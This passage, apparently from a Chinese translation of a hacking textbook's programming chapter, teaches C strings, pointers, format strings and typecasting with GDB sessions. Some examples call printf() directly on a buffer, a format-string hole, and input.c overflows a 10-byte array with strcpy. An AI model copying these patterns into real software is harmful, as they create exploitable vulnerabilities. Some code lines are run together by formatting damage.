最终结果是存储在内存地址 EBP 减 4 (0xbffff804) 处的值，加 1。这种行为对应于一段 C 代码，其中变量 i 在 for 循环中被递增。

下一条指令是一个无条件跳转指令。

(gdb) x/i $eip
0x80483a4 <main+48>:    jmp    0x804838b <main+23> 
(gdb)

当执行此指令时，它将程序送回到地址 0x804838b 的指令。它是通过简单地设置 EIP 为该值来做到这一点的。

再次查看完整的反汇编代码，你应该能够判断出哪些 C 代码被编译成了哪些机器指令。

(gdb) disass main
Dump of assembler code for function main:
0x08048374 <main+0>:    push   ebp
0x08048375 <main+1>:    mov    ebp,esp
0x08048377 <main+3>:    sub    esp,0x8
0x0804837a <main+6>:    and    esp,0xfffffff0
0x0804837d <main+9>:    mov    eax,0x0
0x08048382 <main+14>:   sub    esp,eax
`0x08048384 <main+16>:   mov    DWORD PTR [ebp-4],0x0 0x0804838b <main+23>:   cmp    DWORD PTR [ebp-4],0x9 0x0804838f <main+27>:   jle    0x8048393 <main+31> 0x08048391 <main+29>:   jmp    0x80483a6 <main+50>`
*`0x08048393 <main+31>:   mov    DWORD PTR [esp],0x8048484 0x0804839a <main+38>:   call   0x80482a0 <printf@plt>`*
`0x0804839f <main+43>:   lea    eax,[ebp-4] 0x080483a2 <main+46>:   inc    DWORD PTR [eax] 0x080483a4 <main+48>:   jmp    0x804838b <main+23>`
0x080483a6 <main+50>:   leave
0x080483a7 <main+51>:   ret
End of assembler dump.
(gdb) list
1       #include <stdio.h>
2
3       int main()
4       {
5         int i;
`6         for(i=0; i < 10; i++) 7         {`
8           *`printf("Hello, world!\n");`*
`9         }`
10      } 
(gdb)

粗体显示的指令构成了 for 循环，斜体显示的是循环内的 printf() 调用。程序执行将跳回比较指令，继续执行 printf() 调用，并递增计数器变量，直到它最终等于 10。此时，条件 jle 指令不会执行；相反，指令指针将继续到无条件跳转指令，退出循环并结束程序。

回归基础

现在，编程的概念不那么抽象了，还有一些关于 C 语言的重要概念需要了解。汇编语言和计算机处理器在高级编程语言之前就存在了，许多现代编程概念都是随着时间的推移而演化的。就像对拉丁语的一点点了解可以极大地提高一个人对英语语言的理解一样，对底层编程概念的了解可以帮助理解高级概念。在继续下一节时，请记住，C 代码必须编译成机器指令后才能执行任何操作。

字符串

在前面的程序中传递给printf()函数的值"Hello, world!\n"是一个字符串——技术上讲，是一个字符数组。在 C 语言中，数组简单地是一系列特定数据类型的n个元素。一个 20 个字符的数组仅仅是内存中 20 个相邻的字符。数组也被称为缓冲区。char_array.c 程序是一个字符数组的例子。

char_array.c

#include <stdio.h>
int main()
{
  char str_a[20];
  str_a[0]  = 'H';
  str_a[1]  = 'e';
  str_a[2]  = 'l';
  str_a[3]  = 'l';
  str_a[4]  = 'o';
  str_a[5]  = ',';
  str_a[6]  = ' ';
  str_a[7]  = 'w';
  str_a[8]  = 'o';
  str_a[9]  = 'r';
  str_a[10] = 'l';
  str_a[11] = 'd';
  str_a[12] = '!';
  str_a[13] = '\n';
  str_a[14] = 0;
  printf(str_a);
}

GCC 编译器也可以使用-o开关来定义编译输出的文件。此开关在下面用于将程序编译成名为char_array的可执行二进制文件。

reader@hacking:~/booksrc $ gcc -o char_array char_array.c
reader@hacking:~/booksrc $ ./char_array
Hello, world!
reader@hacking:~/booksrc $

在前面的程序中，定义了一个 20 个元素的字符数组str_a，并且逐个将数组元素写入。请注意，数字从 0 开始，而不是从 1 开始。同时请注意，最后一个字符是 0。（这通常也被称为空字节。）由于字符数组被定义，因此为它分配了 20 个字节，但实际上只使用了 12 个字节。末尾的空字节用作分隔符，以告诉任何处理字符串的函数在此处停止操作。剩余的额外字节只是垃圾，将被忽略。如果在字符数组的第五个元素中插入一个空字节，printf()函数只会打印出Hello。

由于逐个设置字符数组中的每个字符非常繁琐，而字符串的使用相当频繁，因此创建了一套标准函数用于字符串操作。例如，strcpy()函数将从源字符串复制到目标字符串，遍历源字符串并将每个字节复制到目标位置（并在复制空终止字节后停止）。函数参数的顺序类似于 Intel 汇编语法：目标在前，然后是源。char_array.c 程序可以使用strcpy()重写，以使用字符串库完成相同的功能。下面所示的 char_array 程序的下一个版本包括 string.h，因为它使用了字符串函数。

char_array2.c

#include <stdio.h>
#include <string.h>

int main() {
   char str_a[20];

   strcpy(str_a, "Hello, world!\n");
   printf(str_a); 
}

让我们用 GDB 来看看这个程序。在下面的输出中，编译后的程序用 GDB 打开，并在加粗显示的strcpy()调用之前、期间和之后设置了断点。调试器将在每个断点暂停程序，给我们机会检查寄存器和内存。strcpy()函数的代码来自共享库，因此在此函数中设置断点实际上只能在程序执行后进行。

reader@hacking:~/booksrc $ gcc -g -o char_array2 char_array2.c
reader@hacking:~/booksrc $ gdb -q ./char_array2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2       #include <string.h>
3
4       int main() {
5          char str_a[20];
`6 7          strcpy(str_a, "Hello, world!\n"); 8          printf(str_a);`
9       }
(gdb) break 6

Breakpoint 1 at 0x80483c4: file char_array2.c, line 6.
(gdb) break strcpy
Function "strcpy" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 2 (strcpy) pending.
(gdb) break 8
Breakpoint 3 at 0x80483d7: file char_array2.c, line 8\. 
(gdb)

当程序运行时，strcpy()断点被解决。在每个断点处，我们将查看 EIP 及其指向的指令。请注意，中间断点的 EIP 内存位置不同。

(gdb) run
Starting program: /home/reader/booksrc/char_array2 
Breakpoint 4 at 0xb7f076f4
Pending breakpoint "strcpy" resolved

Breakpoint 1, main () at char_array2.c:7
7          strcpy(str_a, "Hello, world!\n");
(gdb) i r eip
eip            0x80483c4        0x80483c4 <main+16>
(gdb) x/5i $eip
0x80483c4 <main+16>:    mov    DWORD PTR [esp+4],0x80484c4
0x80483cc <main+24>:    lea    eax,[ebp-40]
0x80483cf <main+27>:    mov    DWORD PTR [esp],eax
0x80483d2 <main+30>:    call   0x80482c4 <strcpy@plt>
0x80483d7 <main+35>:    lea    eax,[ebp-40]
(gdb) continue
Continuing.

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) i r eip
`eip            0xb7f076f4       0xb7f076f4 <strcpy+4>`
(gdb) x/5i $eip
0xb7f076f4 <strcpy+4>:  mov    esi,DWORD PTR [ebp+8]
0xb7f076f7 <strcpy+7>:  mov    eax,DWORD PTR [ebp+12]
0xb7f076fa <strcpy+10>: mov    ecx,esi
0xb7f076fc <strcpy+12>: sub    ecx,eax
0xb7f076fe <strcpy+14>: mov    edx,eax
(gdb) continue
Continuing.

Breakpoint 3, main () at char_array2.c:8
8          printf(str_a);
(gdb) i r eip
eip            0x80483d7        0x80483d7 <main+35>
(gdb) x/5i $eip
0x80483d7 <main+35>:    lea    eax,[ebp-40]
0x80483da <main+38>:    mov    DWORD PTR [esp],eax
0x80483dd <main+41>:    call   0x80482d4 <printf@plt>
0x80483e2 <main+46>:    leave
0x80483e3 <main+47>:    ret
(gdb)

中间断点处的 EIP 地址不同，因为strcpy()函数的代码来自一个已加载的库。实际上，调试器显示中间断点处的strcpy()函数的 EIP，而其他两个断点处的 EIP 在main()函数中。我想指出，EIP 能够从主代码跳转到strcpy()代码，然后再返回。每次函数被调用时，都会在称为堆栈的数据结构上保留一个记录。堆栈允许 EIP 通过一系列函数调用返回。在 GDB 中，可以使用bt命令来回溯堆栈。在下面的输出中，堆栈回溯显示在每个断点处。

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/char_array2 
Error in re-setting breakpoint 4:
Function "strcpy" not defined.

Breakpoint 1, main () at char_array2.c:7
7          strcpy(str_a, "Hello, world!\n");
(gdb) bt
#0  main () at char_array2.c:7
(gdb) cont
Continuing.

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x080483d7 in main () at char_array2.c:7
(gdb) cont
Continuing.

Breakpoint 3, main () at char_array2.c:8
8          printf(str_a);
(gdb) bt
#0  main () at char_array2.c:8
(gdb)

在中间断点处，堆栈的回溯显示了strcpy()函数的调用记录。同时，你可能注意到在第二次运行时strcpy()函数的地址略有不同。这是由于自 Linux 内核 2.6.11 以来默认启用的一个利用保护方法。我们将在稍后详细讨论这个保护机制。

签名，未签名，长整型和短整型

默认情况下，C 语言中的数值是有符号的，这意味着它们可以是负数也可以是正数。相比之下，无符号值不允许负数。由于最终都是内存，所有数值都必须以二进制形式存储，无符号值在二进制中更有意义。一个 32 位无符号整数可以包含从 0（所有二进制 0）到 4,294,967,295（所有二进制 1）的值。一个 32 位有符号整数仍然是 32 位，这意味着它只能处于 2³²种可能的位组合之一。这允许 32 位有符号整数从-2,147,483,648 到 2,147,483,647 的范围。本质上，其中一位是一个标记值正或负的标志。正的有符号值看起来和无符号值一样，但负数使用称为二进制补码的方法存储。二进制补码以适合二进制加法器的方式表示负数——当二进制补码中的负值与相同大小的正值相加时，结果将是 0。这是通过首先以二进制形式写出正数，然后反转所有位，最后加 1 来完成的。这听起来很奇怪，但它确实有效，并允许使用简单的二进制加法器将负数与正数相加。

这可以通过使用pcalc（一个简单的程序员计算器，以十进制、十六进制和二进制格式显示结果）在较小的规模上快速探索。为了简化，本例中使用 8 位数字。

reader@hacking:~/booksrc $ pcalc 0y01001001
        73              0x49            0y1001001
reader@hacking:~/booksrc $ pcalc 0y10110110 + 1
        183             0xb7            0y10110111
reader@hacking:~/booksrc $ pcalc 0y01001001 + 0y10110111
        256             0x100           0y100000000
reader@hacking:~/booksrc $

首先，二进制值 01001001 被显示为正 73。然后所有位都被反转，并加 1 得到负 73 的二进制补码表示 10110111。当这两个值相加时，原始 8 位的结果为 0。程序pcalc显示值为 256，因为它不知道我们只处理 8 位值。在二进制加法器中，那个进位位会被丢弃，因为变量的内存末尾已经到达。这个例子可能有助于阐明二进制补码是如何发挥其魔力的。

在 C 语言中，可以通过在声明前简单添加关键字unsigned来声明变量为无符号。无符号整数可以用unsigned int声明。此外，可以通过添加关键字long或short来扩展或缩短数值变量的大小。实际的大小将取决于代码编译的架构。C 语言提供了一种名为sizeof()的宏，可以确定某些数据类型的大小。这就像一个函数，它接受一个数据类型作为输入，并返回目标架构上用该数据类型声明的变量的大小。datatype_sizes.c程序通过使用sizeof()函数探索各种数据类型的大小。

datatype_sizes.c

#include <stdio.h>

int main() {
   printf("The 'int' data type is\t\t %d bytes\n", sizeof(int));
   printf("The 'unsigned int' data type is\t %d bytes\n", sizeof(unsigned int));
   printf("The 'short int' data type is\t %d bytes\n", sizeof(short int));
   printf("The 'long int' data type is\t %d bytes\n", sizeof(long int));
   printf("The 'long long int' data type is %d bytes\n", sizeof(long long int));
   printf("The 'float' data type is\t %d bytes\n", sizeof(float));
   printf("The 'char' data type is\t\t %d bytes\n", sizeof(char));
}

这段代码以稍微不同的方式使用了printf()函数。它使用了一种称为格式说明符的东西来显示sizeof()函数调用返回的值。格式说明符将在稍后深入解释，所以现在让我们只关注程序输出。

reader@hacking:~/booksrc $ gcc datatype_sizes.c
reader@hacking:~/booksrc $ ./a.out
The 'int' data type is           4 bytes
The 'unsigned int' data type is  4 bytes
The 'short int' data type is     2 bytes
The 'long int' data type is      4 bytes
The 'long long int' data type is 8 bytes
The 'float' data type is         4 bytes
The 'char' data type is          1 bytes
reader@hacking:~/booksrc $

如前所述，在x86 架构上，有符号和无符号整数的大小都是四字节。浮点数也是四字节，而字符只需要一个字节。long和short关键字也可以与浮点变量一起使用，以扩展和缩短它们的大小。

指针

EIP 寄存器是一个指针，在程序执行过程中通过包含其内存地址来“指向”当前指令。指针的概念在 C 语言中也被使用。由于物理内存实际上不能移动，其中的信息必须被复制。复制大量内存以供不同函数或不同地方使用可能会非常耗费计算资源。从内存的角度来看，这也是昂贵的，因为必须在复制源之前保存或分配新目标复制所需的空间。指针是解决这个问题的方法。而不是复制一大块内存，传递那块内存块的起始地址要简单得多。

C 语言中的指针可以像任何其他变量类型一样定义和使用。由于x86 架构上的内存使用 32 位寻址，指针的大小也是 32 位（4 字节）。指针通过在变量名前加上一个星号(*)来定义。不是定义一个该类型的变量，而是定义一个指向该类型数据的指针。pointer.c程序是一个使用char数据类型的指针的例子，char数据类型的大小仅为 1 字节。

pointer.c

#include <stdio.h>
#include <string.h>

int main() {
   char str_a[20]; // A 20-element character array
   char *pointer;  // A pointer, meant for a character array
   char *pointer2; // And yet another one

   strcpy(str_a, "Hello, world!\n");
   pointer = str_a; // Set the first pointer to the start of the array.
   printf(pointer);

   pointer2 = pointer + 2; // Set the second one 2 bytes further in.
   printf(pointer2);       // Print it.
   strcpy(pointer2, "y you guys!\n"); // Copy into that spot.
   printf(pointer);        // Print again.
}

如代码中的注释所示，第一个指针被设置在字符数组的起始位置。当以这种方式引用字符数组时，它实际上就是一个指针。这就是这个缓冲区之前是如何作为一个指针传递给printf()和strcpy()函数的。第二个指针被设置为第一个指针的地址加 2，然后打印了一些内容（如下面的输出所示）。

reader@hacking:~/booksrc $ gcc -o pointer pointer.c
reader@hacking:~/booksrc $ ./pointer
Hello, world!
llo, world!
Hey you guys!
reader@hacking:~/booksrc $

让我们用 GDB 来看看这个例子。程序被重新编译，并在源代码的第 10 行设置了断点。这将使得程序在将"Hello, world!\n"字符串复制到str_a缓冲区并且指针变量被设置为它的起始地址后停止。

reader@hacking:~/booksrc $ gcc -g -o pointer pointer.c
reader@hacking:~/booksrc $ gdb -q ./pointer
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2       #include <string.h>
3
4       int main()  {
5           char str_a[20]; // A 20-element character array
6           char *pointer;  // A pointer, meant for a character array
7           char *pointer2; // And yet another one
8
9           strcpy(str_a, "Hello, world!\n");
10          pointer = str_a; // Set the first pointer to the start of the array.
(gdb)
11          printf(pointer);
12
13          pointer2 = pointer + 2; // Set the second one 2 bytes further in.
14          printf(pointer2); // Print it.
15          strcpy(pointer2, "y you guys!\n"); // Copy into that spot.
16          printf(pointer); // Print again.
17      }
(gdb) break 11
Breakpoint 1 at 0x80483dd: file pointer.c, line 11.
(gdb) run
Starting program: /home/reader/booksrc/pointer

Breakpoint 1, main () at pointer.c:11
11         printf(pointer);
(gdb) x/xw pointer
0xbffff7e0:     0x6c6c6548
(gdb) x/s pointer
0xbffff7e0:      "Hello, world!\n"
(gdb)

当指针被作为一个字符串检查时，很明显给定的字符串就在那里，并且位于内存地址0xbffff7e0。记住，字符串本身并没有存储在指针变量中——只有内存地址0xbffff7e0被存储在那里。

为了看到指针变量中实际存储的数据，你必须使用地址运算符。地址运算符是一个一元运算符，这意味着它只对一个参数进行操作。这个运算符只是变量名前加上一个&符号。当它被使用时，返回的是变量的地址，而不是变量本身。这个运算符在 GDB 和 C 编程语言中都存在。

(gdb) x/xw &pointer
0xbffff7dc:     0xbffff7e0
(gdb) print &pointer
$1 = (char **) 0xbffff7dc
(gdb) print pointer
$2 = 0xbffff7e0 "Hello, world!\n"
(gdb)

当使用地址运算符时，指针变量显示其在内存中的地址为0xbffff7dc，并且它包含地址0xbffff7e0。

地址运算符通常与指针一起使用，因为指针包含内存地址。addressof.c程序演示了地址运算符被用来将一个整型变量的地址放入指针中。下面这行内容被加粗显示。

addressof.c

#include <stdio.h>

int main() {
   int int_var = 5;
   int *int_ptr;

`int_ptr = &int_var; // put the address of int_var into int_ptr`
}

程序本身实际上并没有输出任何内容，但你可能猜得出会发生什么，甚至在用 GDB 调试之前。

reader@hacking:~/booksrc $ gcc -g addressof.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2
3       int main() {
4               int int_var = 5;
5               int *int_ptr;
6
7               int_ptr = &int_var; // Put the address of int_var into int_ptr.
8       }
(gdb) break 8
Breakpoint 1 at 0x8048361: file addressof.c, line 8.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at addressof.c:8
8       }
(gdb) print int_var
$1 = 5
(gdb) print &int_var
$2 = (int *) 0xbffff804
(gdb) print int_ptr
$3 = (int *) 0xbffff804
(gdb) print &int_ptr
$4 = (int **) 0xbffff800
(gdb)

如往常一样，设置了断点并在调试器中执行程序。此时，程序的大部分已经执行完毕。第一个print命令显示了int_var的值，第二个显示了它的地址，使用了地址运算符。接下来的两个打印命令显示了int_ptr包含int_var的地址，并且还显示了int_ptr的地址作为额外信息。

存在着一个额外的单目运算符，称为解引用运算符，用于与指针一起使用。这个运算符将返回指针指向的地址中的数据，而不是地址本身。它以变量名前的星号(*)形式出现，类似于指针的声明。再次强调，解引用运算符在 GDB 和 C 中都存在。在 GDB 中使用时，它可以检索 int_ptr 指向的整数值。

(gdb) print *int_ptr
$5 = 5

在 addressof.c 代码（在 addressof2.c 中显示）中添加一些内容（将演示所有这些概念。添加的 printf() 函数使用格式参数，我将在下一节中解释。现在，只需关注程序输出即可。

addressof2.c

#include <stdio.h>

int main() {
   int int_var = 5;
   int *int_ptr;

   int_ptr = &int_var; // Put the address of int_var into int_ptr.

   printf("int_ptr = 0x%08x\n", int_ptr);
   printf("&int_ptr = 0x%08x\n", &int_ptr);
   printf("*int_ptr = 0x%08x\n\n", *int_ptr);

   printf("int_var is located at 0x%08x and contains %d\n", &int_var, int_var);
   printf("int_ptr is located at 0x%08x, contains 0x%08x, and points to %d\n\n",
      &int_ptr, int_ptr, *int_ptr);
}

编译并执行 addressof2.c 的结果如下。

reader@hacking:~/booksrc $ gcc addressof2.c
reader@hacking:~/booksrc $ ./a.out
int_ptr = 0xbffff834
&int_ptr = 0xbffff830
*int_ptr = 0x00000005

int_var is located at 0xbffff834 and contains 5
int_ptr is located at 0xbffff830, contains 0xbffff834, and points to 5

reader@hacking:~/booksrc $

当单目运算符与指针一起使用时，地址运算符可以被认为是向相反方向移动，而解引用运算符则沿着指针指向的方向前进。

格式字符串

printf() 函数不仅可以打印固定字符串，还可以使用格式字符串以多种不同的格式打印变量。格式字符串 只是一个包含特殊转义序列的字符字符串，这些转义序列告诉函数在转义序列的位置插入以特定格式打印的变量。在前面程序中使用 printf() 函数的方式中，"Hello, world!\n" 字符串在技术上是一个格式字符串；然而，它没有特殊的转义序列。这些 转义序列 也被称为 格式参数，并且对于格式字符串中找到的每个格式参数，函数都期望有一个额外的参数。每个格式参数以百分号(%)开头，并使用与 GDB 的 examine 命令中使用的格式字符非常相似的单一字符缩写。

参数	输出类型
`%d`	十进制
`%u`	无符号十进制
`%x`	十六进制

所有的前述格式参数都接收它们的值，而不是值的指针。还有一些格式参数期望指针，如下所示。

参数	输出类型
`%s`	字符串
`%n`	已写入的字节数

%s 格式参数期望得到一个内存地址；它将打印该内存地址处的数据，直到遇到空字节。%n 格式参数是独一无二的，因为它实际上会写入数据。它也期望得到一个内存地址，并将迄今为止写入该内存地址的字节数写入进去。

现在，我们的重点将只是用于显示数据的格式参数。fmt_strings.c 程序展示了不同格式参数的一些示例。

fmt_strings.c

#include <stdio.h>

int main() {
   char string[10];
   int A = -73;
   unsigned int B = 31337;

   strcpy(string, "sample");
   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s Address %08x\n", string, string);

   // Example of unary address operator (dereferencing) and a %x format string
   printf("variable A is at address: %08x\n", &A);
}

在前面的代码中，为格式字符串中的每个格式参数的每个 printf() 调用传递了额外的变量参数。最后的 printf() 调用使用参数 A，这将提供变量 A 的地址。程序的编译和执行如下。

reader@hacking:~/booksrc $ gcc -o fmt_strings fmt_strings.c
reader@hacking:~/booksrc $ ./fmt_strings
[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address  bffff870
variable A is at address: bffff86c
reader@hacking:~/booksrc $

printf() 的前两次调用演示了使用不同的格式参数打印变量 A 和 B。由于每行有三个格式参数，变量 A 和 B 需要分别提供三次。%d 格式参数允许负值，而 %u 不允许，因为它期望无符号值。

当变量 A 使用 %u 格式参数打印时，它显示为一个非常高的值。这是因为 A 是一个以二进制补码形式存储的负数，而格式参数正试图将其作为无符号值打印。由于二进制补码翻转所有位并加一，之前为零的高位现在变为一位。

示例中的第三行，标记为 [field width on B]，展示了在格式参数中使用字段宽度选项。这只是一个指定该格式参数的最小字段宽度的整数。然而，这并不是最大字段宽度——如果要输出的值大于字段宽度，则字段宽度将被超出。当使用 3 时就会发生这种情况，因为输出数据需要 5 个字节。当使用 10 作为字段宽度时，在输出数据之前输出 5 个空格字节。此外，如果字段宽度值以 0 开头，这意味着字段应该用零填充。例如，当使用 08 时，输出为 00031337。

标记为 [string] 的第四行简单地展示了 %s 格式参数的使用。记住，变量字符串实际上是一个包含字符串地址的指针，这工作得非常好，因为 %s 格式参数期望通过引用传递数据。

最后的行仅显示了变量 A 的地址，使用一元地址运算符取消引用变量。此值以八个十六进制数字显示，并用零填充。

如这些示例所示，你应该使用 %d 打印十进制值，使用 %u 打印无符号值，使用 %x 打印十六进制值。可以通过在百分号后直接放置一个数字来设置最小字段宽度，如果字段宽度以 0 开头，它将被零填充。%s 参数可以用来打印字符串，并且应该传递字符串的地址。到目前为止，一切顺利。

格式字符串被一系列标准 I/O 函数使用，包括scanf()，它基本上像printf()一样工作，但用于输入而不是输出。一个关键的区别是，scanf()函数期望其所有参数都是指针，因此参数必须是变量地址——而不是变量本身。这可以通过使用指针变量或使用一元地址运算符来检索普通变量的地址来实现。input.c程序和执行结果应该有助于解释。

`input.c`

#include <stdio.h>
#include <string.h>

int main() {
   char message[10];
   int count, i;

   strcpy(message, "Hello, world!");

   printf("Repeat how many times? ");
   scanf("%d", &count);

   for(i=0; i < count; i++)
      printf("%3d - %s\n", i, message);
}

在input.c文件中，使用scanf()函数来设置count变量。下面的输出展示了其用法。

reader@hacking:~/booksrc $ gcc -o input input.c
reader@hacking:~/booksrc $ ./input
Repeat how many times? 3
  0 - Hello, world!
  1 - Hello, world!
  2 - Hello, world!
reader@hacking:~/booksrc $ ./input
Repeat how many times? 12
  0 - Hello, world!
  1 - Hello, world!
  2 - Hello, world!
  3 - Hello, world!
  4 - Hello, world!
  5 - Hello, world!
  6 - Hello, world!
  7 - Hello, world!
  8 - Hello, world!
  9 - Hello, world!
 10 - Hello, world!
 11 - Hello, world!
reader@hacking:~/booksrc $

格式字符串被非常频繁地使用，因此熟悉它们是有价值的。此外，能够输出变量的值允许在程序中进行调试，而不需要使用调试器。对于黑客的学习过程来说，某种形式的即时反馈是相当关键的，而像打印变量值这样简单的事情就可以允许进行大量的利用。

类型转换

类型转换只是临时改变变量数据类型的一种方法，尽管它最初是如何定义的。当一个变量被转换为不同类型时，编译器基本上被指示将那个变量视为新数据类型，但仅限于该操作。类型转换的语法如下：

(typecast_data_type) variable

这可以在处理整数和浮点变量时使用，正如typecasting.c文件所展示的。

`typecasting.c`

#include <stdio.h>

int main() {
   int a, b;
   float c, d;

   a = 13;
   b = 5;

   c = a / b;                 // Divide using integers.
   d = (float) a / (float) b; // Divide integers typecast as floats.

   printf("[integers]\t a = %d\t b = %d\n", a, b);
   printf("[floats]\t c = %f\t d = %f\n", c, d);
}

编译和执行typecasting.c的结果如下。

reader@hacking:~/booksrc $ gcc typecasting.c
reader@hacking:~/booksrc $ ./a.out
[integers]       a = 13 b = 5
[floats]         c = 2.000000    d = 2.600000
reader@hacking:~/booksrc $

如前所述，将整数 13 除以 5 将向下取整到错误答案 2，即使这个值被存储到浮点变量中。然而，如果这些整数变量被转换为浮点数，它们将被视为这样。这允许正确计算 2.6。

这个例子是说明性的，但类型转换真正发挥作用的地方是当它与指针变量一起使用时。尽管指针只是一个内存地址，但 C 编译器仍然要求每个指针都有一个数据类型。这样做的一个原因是为了尽量减少编程错误。整数指针应该只指向整数数据，而字符指针应该只指向字符数据。另一个原因是用于指针算术。整数的大小是四个字节，而字符只占用一个字节。pointer_types.c程序将进一步演示和解释这些概念。此代码使用格式参数%p来输出内存地址。这是一个用于显示指针的简写，基本上等同于0x%08x。

`pointer_types.c`

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   char *char_pointer;
   int *int_pointer;

   char_pointer = char_array;
   int_pointer = int_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the integer %d\n",
            int_pointer, *int_pointer);
      int_pointer = int_pointer + 1;
   }

   for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer.
      printf("[char pointer] points to %p, which contains the char '%c'\n",
            char_pointer, *char_pointer);
      char_pointer = char_pointer + 1;
   }
}

在此代码中，内存中定义了两个数组——一个包含整数数据，另一个包含字符数据。还定义了两个指针，一个具有整数数据类型，一个具有字符数据类型，并将它们设置为指向对应数据数组的起始位置。两个独立的 for 循环通过指针算术迭代数组，以调整指针指向下一个值。在循环中，当使用%d和%c格式参数实际打印整数和字符值时，请注意相应的printf()参数必须取消引用指针变量。这是通过使用一元*运算符完成的，并在上面用粗体标出。

reader@hacking:~/booksrc $ gcc pointer_types.c
reader@hacking:~/booksrc $ ./a.out
[integer pointer] points to 0xbffff7f0, which contains the integer 1
[integer pointer] points to 0xbffff7f4, which contains the integer 2
[integer pointer] points to 0xbffff7f8, which contains the integer 3
[integer pointer] points to 0xbffff7fc, which contains the integer 4
[integer pointer] points to 0xbffff800, which contains the integer 5
[char pointer] points to 0xbffff810, which contains the char 'a'
[char pointer] points to 0xbffff811, which contains the char 'b'
[char pointer] points to 0xbffff812, which contains the char 'c'
[char pointer] points to 0xbffff813, which contains the char 'd'
[char pointer] points to 0xbffff814, which contains the char 'e'
reader@hacking:~/booksrc $

即使在各自的循环中向int_pointer和char_pointer添加相同的值 1，编译器也会以不同的数量增加指针的地址。由于 char 只有 1 个字节，指向下一个 char 的指针自然会多 1 个字节。但既然整数是 4 个字节，指向下一个整数的指针就必须多 4 个字节。

在 pointer_types2.c 中，指针被并置，使得int_pointer指向字符数据，反之亦然。代码的主要更改用粗体标出。

pointer_types2.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   char *char_pointer;
   int *int_pointer;

   `char_pointer = int_array; // The char_pointer and int_pointer now    int_pointer = char_array; // point to incompatible data types.`

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the char '%c'\n",
            int_pointer, *int_pointer);
      int_pointer = int_pointer + 1;
   }

   for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer.
      printf("[char pointer] points to %p, which contains the integer %d\n",
            char_pointer, *char_pointer);
      char_pointer = char_pointer + 1;
   }
}

下面的输出显示了编译器输出的警告。

reader@hacking:~/booksrc $ gcc pointer_types2.c
pointer_types2.c: In function `main':
pointer_types2.c:12: warning: assignment from incompatible pointer type
pointer_types2.c:13: warning: assignment from incompatible pointer type
reader@hacking:~/booksrc $

为了防止编程错误，编译器会对指向不兼容数据类型的指针给出警告。但编译器和可能还有程序员是唯一关心指针类型的人。在编译后的代码中，指针不过是一个内存地址，所以如果指针指向不兼容的数据类型，编译器仍然会编译代码——它只是警告程序员要预料到意外的结果。

reader@hacking:~/booksrc $ ./a.out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff818, which contains the char '8'
[integer pointer] points to 0xbffff81c, which contains the char '
[integer pointer] points to 0xbffff820, which contains the char '?'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f1, which contains the integer 0
[char pointer] points to 0xbffff7f2, which contains the integer 0
[char pointer] points to 0xbffff7f3, which contains the integer 0
[char pointer] points to 0xbffff7f4, which contains the integer 2
reader@hacking:~/booksrc $

即使int_pointer指向的字符数据只包含 5 个字节的数据，它仍然被类型化为整数。这意味着每次向指针添加 1 时，地址会增加 4。同样，char_pointer的地址每次只增加 1，逐字节遍历 20 个字节的整数数据（五个 4 字节的整数）。再次强调，当逐字节检查 4 字节的整数时，整数数据的 littleendian 字节序是明显的。0x00000001的 4 字节值实际上在内存中存储为0x01, 0x00, 0x00, 0x00。

将会出现这种情况，即你使用了一个指向具有冲突类型的数据的指针。由于指针类型决定了它指向的数据的大小，因此确保类型正确非常重要。正如你在下面的 pointer_types3.c 中可以看到，类型转换只是动态更改变量类型的一种方式。

pointer_types3.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   char *char_pointer;
   int *int_pointer;

   char_pointer = (char *) int_array; // Typecast into the
   int_pointer = (int *) char_array;  // pointer's data type.

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the char '%c'\n",
            int_pointer, *int_pointer);
      `int_pointer = (int *) ((char *) int_pointer + 1);`
   }

   for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer.
      printf("[char pointer] points to %p, which contains the integer %d\n",
            char_pointer, *char_pointer);
      `char_pointer = (char *) ((int *) char_pointer + 1);`
   }
}

